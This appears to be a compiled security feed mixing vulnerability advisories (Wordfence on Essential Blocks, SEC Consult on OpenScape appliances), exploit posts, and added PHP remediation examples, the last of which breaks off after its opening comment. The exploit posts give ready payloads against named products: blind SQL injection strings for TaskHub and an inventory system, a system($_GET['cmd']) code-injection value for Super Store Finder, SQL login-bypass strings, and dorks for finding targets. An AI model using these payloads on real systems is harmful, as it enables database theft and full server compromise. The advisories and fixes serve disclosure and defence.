<pre><code>Vulnerability Summary from Wordfence Intelligence<br /><br />Description: Insecure Deserialization/PHP Object Injection via queries <br /><br />Affected Plugin: Essential Blocks, Essential Blocks Pro<br /><br />Plugin slug: essential-blocks, essential-blocks-pro<br /><br />Vendor: WPDeveloper<br /><br />Affected versions: <= 4.2.0 (Free) and <= 1.1.0 (Pro)<br /><br />CVE ID: CVE-2023-4386<br /><br />CVSS score: 8.1 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher: Marco Wotschka <br /><br />Fully Patched Version: 4.2.1 & 1.1.1<br /><br />The Essential Blocks plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 4.2.0 via deserialization of untrusted input in the get_posts function. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.<br /><br />Description: Insecure Deserialization/PHP Object Injection via products <br /><br />Affected Plugin: Essential Blocks, Essential Blocks Pro<br /><br />Plugin slug: essential-blocks<br /><br />Vendor: WPDeveloper<br /><br />Affected versions: <= 4.2.0 (Free) and <= 1.1.0 (Pro)<br /><br />CVE ID: CVE-2023-4402<br /><br />CVSS score: 8.1 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher: Marco Wotschka <br /><br />Fully Patched Version: 4.2.1 & 1.1.1<br /><br />The Essential Blocks plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 4.2.0 via deserialization of untrusted input in the get_products function. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. 
If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.<br /><br />Technical Analysis<br /><br />The Essential Blocks plugin provides more than 40 blocks to its users including sliders, buttons, pricing tables, maps and others. An API is provided to query for posts and products via the queries and products API endpoints which do not require authentication.<br /><br />Unfortunately, query data and attributes were passed in PHP’s serialized string format and were subsequently unserialized by the functions get_posts (for the queries endpoint) and get_products (for the products endpoint) in /includes/API/PostBlock.php and /includes/API/Product.php, respectively.<br /><br />[Screenshot: get_posts function]<br /><br />[Screenshot: get_products function]<br /><br />Attackers could utilize this to inject a PHP object with properties of their choosing. The presence of a PHP POP chain can make it possible for an attacker to execute arbitrary code, create and delete files and potentially take over a vulnerable site. Fortunately, no POP chain is present in the Essential Blocks plugin, which means an attacker would require another plugin or theme installed on the vulnerable site with a POP chain present in order to fully exploit these vulnerabilities. It is worth mentioning that POP chains can sometimes be found in popular plugins and libraries which include destructor methods that perform cleanup tasks when an Object is destroyed or deserialized.<br /><br />Despite the lack of a POP chain in the Essential Blocks plugin itself, and the complexity involved in exploiting these types of vulnerabilities, a successful attack often leads to severe consequences. 
We explain how PHP Object Injections work in this blog post, if you are interested in finding out more about their inner workings.<br /><br />Timeline<br /><br />August 17, 2023 – The Wordfence Threat Intelligence team discovers two PHP Object Injection vulnerabilities in the Essential Blocks plugin.<br /><br />August 18, 2023 – We release a firewall rule to protect Wordfence Premium, Wordfence Care, and Wordfence Response customers and initiate the disclosure process.<br /><br />August 23, 2023 – We send the full disclosure to the plugin developer.<br /><br />August 29, 2023 – A patched version of the Essential Blocks plugin, 4.2.1 (1.1.1 for Pro), is released.<br /><br />September 17, 2023 – The firewall rule becomes available to free Wordfence users.<br /><br />Conclusion<br /><br />In this blog post, we covered two PHP Object Injection vulnerabilities in the Essential Blocks plugin affecting versions 4.2.0 and earlier in the Free version of the plugin and versions 1.1.0 and earlier in the Pro version. These vulnerabilities allow unauthenticated threat actors to query the plugin’s API using serialized malicious payloads that are subsequently deserialized. They have been fully addressed in version 4.2.1 of the free version of the plugin and 1.1.1 of the Pro version of the plugin.<br /><br />We encourage WordPress users to verify that their sites are updated to the latest patched version of Essential Blocks.<br /><br />All Wordfence users running Wordfence Premium, Wordfence Care, and Wordfence Response have been protected against these vulnerabilities as of August 18, 2023. 
Users still using the free version of Wordfence received protection on September 17, 2023.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br />For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.<br /><br /></code></pre>
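The fix for the pattern described in the Wordfence analysis above is to stop handing request data to unserialize() at all, or at least to forbid object instantiation. The following is an added example, not code from Wordfence or from the Essential Blocks plugin; the class Tracing_Class and the three decode functions are assumed names, and Tracing_Class is a harmless stand-in for whatever class with a magic method happens to be loaded on a site. It requires PHP 8.

```php
<?php
// Added example (not Essential Blocks code): unserialize() on untrusted
// input versus two safer alternatives. Class and function names are assumed.
declare(strict_types=1);

// Harmless stand-in for any loaded class with a magic method. On a real site
// the dangerous ones live in third-party plugins and themes (a POP chain).
final class Tracing_Class
{
    public string $note = '';
    public static array $events = [];

    public function __wakeup(): void
    {
        self::$events[] = 'wakeup:' . $this->note;
    }
}

// The pattern the advisory describes: attribute data that arrived in the
// request goes straight to unserialize(), so any loaded class can be built.
function vulnerable_decode(string $untrusted): mixed
{
    return unserialize($untrusted);
}

// Fix 1: forbid object instantiation. Every object in the payload becomes
// __PHP_Incomplete_Class and no __wakeup()/__destruct() runs.
function safe_decode_no_objects(string $untrusted): mixed
{
    return unserialize($untrusted, ['allowed_classes' => false]);
}

// Fix 2 (preferred for block attributes, which are plain data): do not use
// PHP's serialization format at all. JSON has no object instantiation.
function safe_decode_json(string $untrusted): ?array
{
    $data = json_decode($untrusted, true, 32);
    return is_array($data) ? $data : null;
}

// Constructed sample inputs: a plain attribute array and an object payload.
$benign = serialize(['posts_per_page' => 5, 'order' => 'DESC']);
$object = serialize((function () {
    $t = new Tracing_Class();
    $t->note = 'injected';
    return $t;
})());

var_dump(vulnerable_decode($benign));          // the intended array
vulnerable_decode($object);                    // __wakeup() of the loaded class runs
echo count(Tracing_Class::$events), PHP_EOL;   // 1

$r = safe_decode_no_objects($object);
echo get_class($r), PHP_EOL;                   // __PHP_Incomplete_Class
echo count(Tracing_Class::$events), PHP_EOL;   // still 1: no magic method ran

var_dump(safe_decode_json(json_encode(['posts_per_page' => 5])));
```

The allowed_classes option closes the gap the advisory describes (the payload is still parsed, but cannot reach a destructor or wakeup method); switching the endpoint to JSON removes the serialization format as an attack surface entirely, which is the better choice when the data is plain attributes rather than objects.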
<pre><code># Exploit Title: taskhub 2.8.7 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 05/09/2023<br /># Vendor: Infinitie Technologies<br /># Vendor Homepage: https://www.infinitietech.com/<br /># Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874<br /># Demo: https://taskhub.company/auth<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /># CVE: CVE-2023-4987<br /># CWE: CWE-89 - CWE-74 - CWE-707<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />SQL injection attacks can allow unauthorized access to sensitive data, modification of<br />data and crash the application or make it unavailable, leading to lost revenue and<br />damage to a company's reputation.<br /><br /><br />Path: /home/get_tasks_list<br /><br />GET parameter 'project' is vulnerable to SQL Injection<br />GET parameter 'status' is vulnerable to SQL Injection<br />GET parameter 'user_id' is vulnerable to SQL Injection<br />GET parameter 'sort' is vulnerable to SQL Injection<br />GET parameter 'search' is vulnerable to SQL Injection<br /><br /><br />https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi]<br /><br /><br />---<br />Parameter: project (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=<br /><br />Parameter: status (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: 
project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=<br /><br />Parameter: user_id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search=<br /><br />Parameter: sort (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search=<br /><br />Parameter: search (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW<br />---<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Vulnerability : Authenticated Arbitrary PHP Code Injection lead to Remote<br />Code Execution<br /># Researcher : Etharus<br /># Vendor : Joe Iz, https://www.superstorefinder.net/<br /># Demo Url : https://superstorefinder.net/products/superstorefinder/<br /># Version Affected : 3.7 and below<br /># Date : 18 September 2023<br /># FOFA Dork : "designed and built by Joe Iz."<br /># Step 1 : Login as user/admin<br /># Step 2 : Go to Settings on right top<br /># Step 3 : Turn on proxy to intercept request and save the settings<br /># Step 4 : On language_set parameter set the value to<br /> en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//<br /># Step 5 : Due to index.php called config.inc.php , we just can go for rce<br />with parameter ?cmd=<br /># Step 6 : Example. http://localhost/?cmd=uname%20-a<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Lamano CMS v2.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://www.progetis.lu/ | <br />| # Dork : © 2018 Lamano by easysolutions |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : user & Pass : 1' or 1=1 -- -<br /><br />[+] https://www.sylviebecker127.0.1.1lu<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : lacabane v1.0 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.samuelniang.eu/cv.html | <br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] use payload in user & pass : 1'or'1'='1<br /><br />[+] http://lacabanedesloupiots127.0.0.1com/admin.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Free and Open Source Inventory Management System 1.0 - Unauthenticated SQL Injection<br /># Exploit Author: Sefa Ozan<br /># Date: 16/09/2023<br /># Vendor: MAYURIK<br /># Vendor Homepage: https://mayurik.com/<br /># Software Link: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html<br /># Tested on: Windows 10 Pro & Ubuntu 22.04<br /><br /><br />## Description:<br />The `pid[]` parameter is vulnerable to Time Based SQL injection attacks. To prove the existence of the vulnerability, the database was put to sleep for 10 seconds.<br /><br /><br />## Request: <br />POST /ample/app/action/sell.php HTTP/1.1<br />Host: localhost<br />User-Agent: python-requests/2.31.0<br />Accept-Encoding: gzip, deflate, br<br />Accept: */*<br />Connection: close<br />Content-Length: 297<br />Content-Type: application/x-www-form-urlencoded<br /><br />customer_name=1&orderdate=16/12/2023&pid[]=1+AND+(SELECT+IF+(1=1,sleep(10),'A'))='A'+OR+'SEFA'=:value&total_quantity[]=12&price[]=4500&orderQuantity[]=1&totalPrice[]=4500&pro_name[]=&subtotal=4500&s_discount_amount=0&discount=&prev_due=12&netTotal=4500&paidBill=123&dueBill=4377&payMethode=PhonePe<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230918-0 ><br />=======================================================================<br /> title: Authenticated Remote Code Execution and<br /> Missing Authentication<br /> product: Atos Unify OpenScape Session Border Controller<br /> Atos Unify OpenScape Branch<br /> Atos Unify OpenScape BCF<br /> vulnerable version: OpenScape SBC before V10 R3.3.0<br /> OpenScape Branch V10 before V10 R3.3.0<br /> OpenScape BCF V10 before V10 R10.10.0<br /> fixed version: OpenScape SBC V10 >=R3.3.0<br /> OpenScape Branch V10 >=R3.3.0<br /> OpenScape BCF V10 >=R10.10.0<br /> CVE number: CVE-2023-36618, CVE-2023-36619<br /> impact: critical<br /> homepage: https://unify.com<br /> found: 2023-04-21<br /> by: Armin Weihbold (Office Linz)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Unify is is the Atos brand for communication and collaboration solutions<br />Unify is the newest member of the Atos family, combining Atos’ knowledge and<br />reputation in the IT services market with Unify’s expertise in unified<br />communications and collaboration to provide customers with seamless services<br />solutions for their entire digital portfolio. 
Within Atos, Unify continues to<br />deliver a unique integrated proposition for unified communications and real<br />time capabilities."<br /><br />Source: https://unify.com/en/expert/unify<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends that users of the affected products install the latest<br />update.<br /><br />Furthermore, an in-depth security analysis performed by security professionals<br />is highly advised, as the software may be affected by other security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Authenticated Remote Code Execution (CVE-2023-36618)<br />The API of the administrative web application insufficiently validates the<br />input of authenticated users at the server. This leads to the possibility of<br />executing arbitrary PHP functions (with some defined exceptions) and<br />subsequently operating system level commands with root privileges.<br />A low-privileged ReadOnly role is sufficient to exploit this security issue.<br /><br />2) Missing Authentication (CVE-2023-36619)<br />A number of scripts that are used to administer the appliance can be<br />accessed or executed unauthenticated via the web server.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Authenticated Remote Code Execution (CVE-2023-36618)<br />A large part of the application is built according to the scheme in the<br />following listing. 
Some functions are defined and at the end the function<br />`callMainFunction` is called, which takes care of processing POST data.<br /><br />-----------------------------------------------------------------------<br /> <?php<br /> require_once '../core/CoreAPI.php';<br /><br /> function tempSessionAcdQueue($args = null)<br /> {<br /> [...SNIP...]<br /> }<br /><br /> function getAcdQueueInfo($args = null) {<br /> [...SNIP...]<br /> }<br /><br /> // calls function which will handle the Post requests<br /> callMainFunction();<br />-----------------------------------------------------------------------<br /><br />`callMainFunction` in `/srv/www/htdocs/core/CoreAPI.php` essentially<br />calls arbitrary functions with arbitrary arguments passed via POST parameters,<br />and only tests beforehand whether or not they are in a list of forbidden<br />functions (`cfgUtilCheckMethod`) and whether the user is authenticated:<br /><br />-----------------------------------------------------------------------<br /> <?php<br />[...]<br /> require_once 'cfgUtil.php';<br />[...]<br /><br /><br /> function callMainFunction () {<br /><br /> $func = ( isset($_POST['method']) ) ? trim(cfgUtilGetPostData('method')) : null ;<br /> if (cfgUtilCheckMethod($func)) return;<br /> $args = ( isset($_POST['args']) ) ? 
cfgUtilSanitizePostArgs(json_decode($_POST['args'], true)) : null ;<br />[...]<br /><br /> if ( function_exists($func) && is_callable($func) ) {<br /> @session_start();<br /> if (!isset($_SESSION["Authenticated"]) || ($_SESSION["Authenticated"] == false)) {<br /> session_destroy();<br />[...]<br /> } else {<br /> if ( $args != null ) $func($args);<br /> else $func();<br /> }<br /> }<br /> }<br />-----------------------------------------------------------------------<br /><br />Then `cfgUtilCheckMethod` in `/srv/www/htdocs/core/cfgUtil.php` checks for a number<br />of dangerous functions which should get blocked:<br /><br />-----------------------------------------------------------------------<br />function cfgUtilCheckMethod($func)<br />{<br /> if (isset($func)) {<br /> // block methods<br /> $methods = array(<br />[...]<br /> "eval",<br /> "exec",<br />[...]<br /> "shell_exec",<br />[...]<br /> "system",<br /> );<br /> if (in_array($func, $methods)) return 1;<br /> }<br /> return 0;<br />}<br />-----------------------------------------------------------------------<br /><br />What has been forgotten here are the functions provided by cfgUtil.php itself<br />like `cfgUtilExecute`, `cfgUtilShellExec` and especially<br />`cfgUtilShellExecSudo`, `cfgUtilSetPermExecSudo` and `cfgUtilExecSudo`.<br /><br />These functions allow an authenticated attacker (a ReadOnly role is sufficient<br />for this) to execute arbitrary commands as root user on the appliance.<br /><br />-----------------------------------------------------------------------<br />function cfgUtilShellExecSudo( $command, $escape = TRUE, $supressLog = FALSE )<br />{<br /> $newcommand=$command;<br /> if ( $escape == TRUE ) $newcommand = escapeshellcmd($command);<br /> if ( ($newcommand != $command) and ($supressLog != TRUE ) )<br /> osb_log(E_WARNING, debug_backtrace()[1]['function']. "(): The command: " . $command . " is not equivalent to: " . 
$newcommand);<br /> $retvalue = trim(shell_exec('/usr/bin/sudo ' . $newcommand ));<br /> return $retvalue;<br />}<br />-----------------------------------------------------------------------<br /><br />To demonstrate the RCE vulnerability, it is sufficient to send a request like<br />the following to any endpoint that calls `callMainFunction` like in:<br />[PoC URL removed]<br />-----------------------------------------------------------------------<br />[PoC POST request removed]<br />-----------------------------------------------------------------------<br /><br /><br />The server response indicates a successful request:<br />-----------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Fri, 21 Apr 2023 10:22:42 GMT<br />Server: Apache<br />X-Frame-Options: SAMEORIGIN<br />Expires: 0<br />Cache-Control: max-age=0, must-revalidate<br />Pragma: no-cache<br />Content-Length: 0<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />-----------------------------------------------------------------------<br /><br />If we now list the contents of the `/tmp` directory on the server, we see<br />that the file `root_from_ro` was created by the root user:<br /><br /><br />-----------------------------------------------------------------------<br />user@server:/tmp> ls -al<br />[...]<br />-rw-r--r-- 1 root root 0 Apr 21 10:22 root_from_ro<br />-----------------------------------------------------------------------<br /><br /><br />2) Missing Authentication (CVE-2023-36619)<br />The following scripts, which are executable without authentication and<br />do not expect command line arguments, could be identified. For this,<br />heuristic methods based on the source code were used. 
In particular, scripts<br />were searched that do not use any of the normally used authentication<br />methods and do not consist only of classes.<br /><br />- https://hostname/core/configuringInBackground.php<br />- https://hostname/core/downloadProfiles.php<br />- https://hostname/core/hello_world.php<br />- https://hostname/core/scripts/applyZooServerData.php<br />- https://hostname/core/scripts/cfgGenUpdateSSPStatusTable.php<br />- https://hostname/core/scripts/checkcardsDbHw.php<br />- https://hostname/core/scripts/config1.php<br />- https://hostname/core/scripts/recover.php<br />- https://hostname/core/scripts/start.php<br />- https://hostname/core/scripts/startPre.php<br />- https://hostname/core/shutdown.php<br />- https://hostname/data/sipLbInfo.php<br />- https://hostname/data/turnInfo.php<br /><br />The following request demonstrates such an execution; it is sent<br />to the appliance:<br /><br /><br />-----------------------------------------------------------------------<br />GET /core/scripts/start.php HTTP/1.1<br />Host: hostname<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Dest: document<br />Referer: https://hostname/acd.html<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br />-----------------------------------------------------------------------<br /><br />In the successful response, the time is highlighted to compare with the PHP<br />log:<br /><br />-----------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Thu, 20 Apr 2023 11:47:34 GMT<br />Server: Apache<br />X-Frame-Options: SAMEORIGIN<br />Cache-Control: max-age=0, must-revalidate<br />Pragma: no-cache<br />Expires: 0<br />Content-Length: 0<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />-----------------------------------------------------------------------<br /><br />In the PHP log you will now find 
the following output, which shows that<br />this script is used for configuring and starting the appliance and was<br />actually executed:<br /><br />-----------------------------------------------------------------------<br />2023-04-20T11:47:34+00:00 [notice] PHP Notice: --------------------------------------- in /srv/www/htdocs/core/scripts/start.php on line 33<br />[...] ---------- Running start.php ---------- in /srv/www/htdocs/core/scripts/start.php on line 34<br />[...] --------------------------------------- in /srv/www/htdocs/core/scripts/start.php on line 35<br />[...] Loading XML in /srv/www/htdocs/core/scripts/start.php on line 61<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 599<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 600<br />[...] ---------- Running start() OSS ----------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 601<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 602<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 603<br />[...] Starting start() OSS in /srv/www/htdocs/core/ConfigMgrOSS.php on line 607<br />[...] Active partition: 4 /dev/sda6 in /srv/www/htdocs/core/ConfigMgrOSS.php on line 613<br />[...] Calling hookStart start in /srv/www/htdocs/core/ConfigMgrOSS.php on line 622<br />[...] Configuring Alarm in /srv/www/htdocs/core/ConfigMgrOSS.php on line 626<br />[...] Configuring Node for Redundancy in /srv/www/htdocs/core/ConfigMgrOSS.php on line 630<br />[...] Red. Selection cleared (standlone)... in /srv/www/htdocs/core/NetServicesData.php on line 162<br />[...] Redundant Node 1 removed in /srv/www/htdocs/core/NetServicesData.php on line 163<br />[...] Redundant Node 2 removed in /srv/www/htdocs/core/NetServicesData.php on line 164<br />[...] 
Configuring Watchdog in /srv/www/htdocs/core/ConfigMgrOSS.php on line 640<br />[...] Configuring irqBalance in /srv/www/htdocs/core/ConfigMgrOSS.php on line 644<br />[...] Configuring OpenVmWare in /srv/www/htdocs/core/ConfigMgrOSS.php on line 648<br />[...] Configuring RADIUS in /srv/www/htdocs/core/ConfigMgrOSS.php on line 662<br />[...] Configuring SSH Public Keys in /srv/www/htdocs/core/ConfigMgrOSS.php on line 666<br />[...] Configuring IP Aliases in /srv/www/htdocs/core/ConfigMgrOSS.php on line 671<br />[...] Configuring Traffic Shaping in /srv/www/htdocs/core/ConfigMgrOSS.php on line 679<br />[...] Configuring Zookeeper Client in /srv/www/htdocs/core/ConfigMgrOSS.php on line 688<br />[...] Configuring RTP Proxy in /srv/www/htdocs/core/ConfigMgrOSS.php on line 693<br />[...] Configuring SSM in /srv/www/htdocs/core/ConfigMgrOSS.php on line 697<br />[...] Configuring SipServer in /srv/www/htdocs/core/ConfigMgrOSS.php on line 705<br />[...] UA WhiteList: in /srv/www/htdocs/core/cfgSipServerSP.php on line 2896<br />[...] simplexml_load_file( /osb/var/mngmt/xml/running/config_20_20230223T115247.xml ) in /srv/www/htdocs/core/PersistenceMgr.php on line 520<br />[...] Circuit feature enabled ? 0 in /srv/www/htdocs/core/AnsibleData.php on line 42<br />[...] New xml cache file created daec97748bc1828d8514ee16e200a834 in /srv/www/htdocs/core/PersistenceMgr.php on line 1883<br />[...] Locking SSP Register in /srv/www/htdocs/core/cfgSipServerOSS.php on line 2682<br />[...] SipServer configuration changed. in /srv/www/htdocs/core/cfgSipServerSP.php on line 2595<br />[...] Configuring Media Server in /srv/www/htdocs/core/ConfigMgrOSS.php on line 726<br />[...] Configuring IPSec in /srv/www/htdocs/core/ConfigMgrOSS.php on line 734<br />[...] Configuring VPN in /srv/www/htdocs/core/ConfigMgrOSS.php on line 741<br />[...] Configuring Certificate Management in /srv/www/htdocs/core/ConfigMgrOSS.php on line 745<br />[...] 
Configuring Web Secure Management in /srv/www/htdocs/core/ConfigMgrOSS.php on line 749<br />[...] Configuring TURN Server in /srv/www/htdocs/core/ConfigMgrOSS.php on line 754<br />[...] Configuring Sip Loadbalancer in /srv/www/htdocs/core/ConfigMgrOSS.php on line 759<br />[...] Configuring GTC Loader in /srv/www/htdocs/core/ConfigMgrOSS.php on line 764<br />[...] Configuring GTC Node app in /srv/www/htdocs/core/ConfigMgrOSS.php on line 769<br />[...] Configuring Serviceability in /srv/www/htdocs/core/ConfigMgrOSS.php on line 774<br />[...] Configuring QoS Send Trap in /srv/www/htdocs/core/ConfigMgrOSS.php on line 779<br />[...] Configuring Push Notification in /srv/www/htdocs/core/ConfigMgrOSS.php on line 784<br />[...] Configuring Branding in /srv/www/htdocs/core/ConfigMgrOSS.php on line 797<br />[...] Calling hookStart stop in /srv/www/htdocs/core/ConfigMgrOSS.php on line 800<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 838<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 839<br />[...] ---------- Done start() OSS ----------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 840<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 841<br />[...] --------------------------------------------- in /srv/www/htdocs/core/ConfigMgrOSS.php on line 842<br />[...] --------------------------------------- in /srv/www/htdocs/core/scripts/start.php on line 77<br />[...] ---------- Done start.php (0) --------- in /srv/www/htdocs/core/scripts/start.php on line 78<br />[...] 
--------------------------------------- in /srv/www/htdocs/core/scripts/start.php on line 79<br />[...]<br />-----------------------------------------------------------------------<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version was tested; it was the latest version available<br />at the time of the test:<br />* OpenScape Session Border Controller Firmware Version V10 R3.01.03<br /><br />According to the vendor, versions before V10 R3.3.0 are affected as well.<br /><br />The vendor confirmed that the following other products are vulnerable as well:<br />* OpenScape Branch version before V10 R3.3.0<br />* OpenScape BCF version before V10 R10.10.0<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-06-12: Contacting vendor through email obso@atos.net; sending<br /> encrypted advisory (S/MIME)<br />2023-06-15: Call with vendor, discussing release and timeline.<br /> Requesting CVE numbers through MITRE.<br />2023-06-28: Vendor provides update regarding timeline / patch availability and<br /> affected products.<br /> Sending received CVE numbers to vendor.<br />2023-06-29: Vendor provides draft of their security advisory including<br /> planned release dates of patched versions. 
Giving feedback.<br /> Receiving download URL from vendor.<br />2023-07-04: Receiving updated version of vendor security advisory,<br /> providing some more feedback/minor fixes.<br />2023-07-06: Vendor releases security advisory and patches.<br />2023-09-18: Coordinated release of advisory<br /><br /><br />Solution:<br />---------<br />The vendor provides a patch for the affected products:<br />* OpenScape Session Border Controller Firmware Version V10 >=R3.3.0<br />* OpenScape Branch version V10 >=R3.3.0<br />* OpenScape BCF version V10 >=R10.10.0<br /><br />The patches can be obtained for registered customers through the vendor's<br />download server:<br />https://sws.unify.com/SWSIntranet/SWSIntra.aspx or via<br />https://unify.com/en/partner/partnerportal<br />https://unify.com/en/support/kunden-support-portal<br /><br />Furthermore, the vendor has also released a security advisory which is<br />available here:<br />https://networks.unify.com/security/advisories/OBSO-2307-01.pdf<br /><br /><br />Workaround:<br />-----------<br />Limit access to the administrative web application to authorized personnel<br />on the network level.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF A. Weihbold / @2023<br /><br /></code></pre>
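The dispatcher at the heart of CVE-2023-36618 above calls whatever function name arrives in `POST['method']` unless it is on a deny-list, which is exactly why the cfgUtil helpers such as `cfgUtilShellExecSudo` were reachable: a deny-list has to enumerate every dangerous callable, including the application's own. The following is an added example, not Atos/Unify code, showing the inverse design: an explicit registry of exposed API methods, each with the minimum role allowed to call it, so an unregistered name is never resolved to a PHP function at all. The role names, handler functions and registry layout are assumptions.

```php
<?php
// Added example (not Atos/Unify code): an allow-list API dispatcher that
// replaces the deny-list check in the advisory's callMainFunction().
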